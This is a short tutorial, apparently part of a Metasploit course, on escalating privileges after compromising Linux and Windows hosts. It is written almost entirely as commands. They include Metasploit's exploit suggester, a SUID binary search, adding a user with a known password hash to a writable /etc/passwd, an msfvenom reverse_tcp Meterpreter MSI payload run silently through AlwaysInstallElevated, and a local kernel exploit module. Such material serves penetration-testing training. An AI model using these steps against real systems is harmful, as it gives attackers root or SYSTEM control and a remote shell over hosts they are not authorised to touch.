
08. Metasploit Post Exploitation Privilege Escalation

Privilege Escalation Post-Exploitation

Privilege escalation techniques allow you to gain higher-level access after initial compromise.

Common Techniques

  1. Identify kernel vulnerabilities: run local_exploit_suggester against the Meterpreter session:

    use post/multi/recon/local_exploit_suggester
    set SESSION <session-id>
    run

Linux Privilege Escalation

  2. Find SUID binaries:

    find / -perm -u=s -type f 2>/dev/null

  3. Exploit a writable passwd file: if /etc/passwd is writable, generate a password hash:

    openssl passwd -1 -salt h4ck3r password123

    Add a new user with this hash to /etc/passwd.

Windows Privilege Escalation

  4. Enumerate privileges:

    whoami /priv

  5. Exploit AlwaysInstallElevated: check whether the policy is enabled:

    reg query HKLM\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

    If enabled, create an MSI payload and execute it:

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=<your-ip> LPORT=<your-port> -f msi -o shell.msi
    msiexec /quiet /qn /i shell.msi

  6. Use local exploit modules: exploit vulnerable software for privilege escalation, e.g.:

    use exploit/windows/local/ms16_098_track_popup_menu
    set SESSION <session-id>
    run